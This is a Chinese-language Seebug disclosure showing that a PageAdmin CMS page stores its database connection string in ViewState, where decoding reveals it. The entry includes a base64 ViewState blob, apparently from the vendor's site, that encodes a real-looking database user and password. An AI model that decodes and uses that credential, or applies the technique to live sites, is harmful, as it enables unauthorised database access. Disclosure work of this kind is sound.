PageAdmin VIEWSTATE引发的血案

2014-07-04T00:00:00
ID SSV:95666
Type seebug
Reporter Root
Modified 2014-07-04T00:00:00

Description

简要描述:

本想找个注入的,却发现Isstr() 与其绕过不如*****(此处打码)直接来的痛快。 @wefgod 小弟弱弱的告诉你 ViewState不仅仅可以WooYun-2014-61699这样用,还可以这样滴哟

详细说明:

下载pageAdmin 反编译发现混淆过 蛋疼! 只好翻翻页面!各种页面各种翻 咿!尼玛 这是啥 ViewState["constr"]
那就抄刀上阵吧

打开 :http://192.168.10.64:9992/e/member/index.aspx?s=1&type=mem_favolst

<img src="https://images.seebug.org/upload/201407/041557062b1b400ebaa4ab1c0d4e250f6006c693.png" alt="111.png" width="600" onerror="javascript:errimg(this);">

复制然后

<img src="https://images.seebug.org/upload/201407/0415574131461ba6819286874a4c22723759185b.png" alt="222.png" width="600" onerror="javascript:errimg(this);">

这是在本地搭建的
那试试官网 附上官网的

/wEPDwUKMTc0NDY2MzU3Ng9kFgQCAg9kFgJmD2QWDmYPFgIeB1Zpc2libGVnZAIBDxYCHwBnZAIFDxYCHgtfIUl0ZW1Db3VudGZkAgkPFgIfAGdkAgoPFgIfAGdkAg0PFgIfAGdkAg4PFgIfAGhkAgQPZBYCZg8PFg4eBmNvbnN0cgVzUHJvdmlkZXI9U1FMT0xFREI7RGF0YSBTb3VyY2U9MTI3LjAuMC4xO0luaXRpYWwgQ2F0YWxvZz1zcV9wYWdlYWRtaW47VXNlciBJRD1zcV9wYWdlYWRtaW47UGFzc3dvcmQ9Z3VvanVueXUyMDA3MDgwNB4LQ3VycmVudFBhZ2VmHgxDYWxjdWxhdGVzcWwFTHNlbGVjdCAgY291bnQoaWQpIGFzIGNvIGZyb20gcGFfZm5jX2xpc3Qgd2hlcmUgdGhldHlwZT0xIGFuZCB1c2VybmFtZT0nRGFtbyceA3NxbAVOc2VsZWN0ICogZnJvbSBwYV9mbmNfbGlzdCB3aGVyZSB0aGV0eXBlPTEgYW5kIHVzZXJuYW1lPSdEYW1vJyBvcmRlciBieSBpZCBkZXNjHghQYWdlU3ppZQUCMjAeCVBhZ2VDb3VudGYeC1JlY29yZENvdW50ZmQWAmYPZBYUZg8QZGQWAWZkAgEPFgIfAWZkAgIPFgIeBFRleHQFATBkAgMPFgIfCQUBMWQCBA8WAh8JBQExZAIFDw8WAh4HRW5hYmxlZGhkZAIGDw8WAh8KaGRkAgcPDxYCHwpoZGQCCA8PFgIfCmhkZAIJDxBkEBUAFQAUKwMAFgBkZA== 解密

<img src="https://images.seebug.org/upload/201407/0415581255997d9d6c9d54f73c2d4034916c27e6.png" alt="333.png" width="600" onerror="javascript:errimg(this);">

漏洞证明:

<img src="https://images.seebug.org/upload/201407/041559073557b8fc2bbc5eb9f81c34fa1b8eb082.png" alt="444.png" width="600" onerror="javascript:errimg(this);">

工具百度网盘不让上传需要的话 私信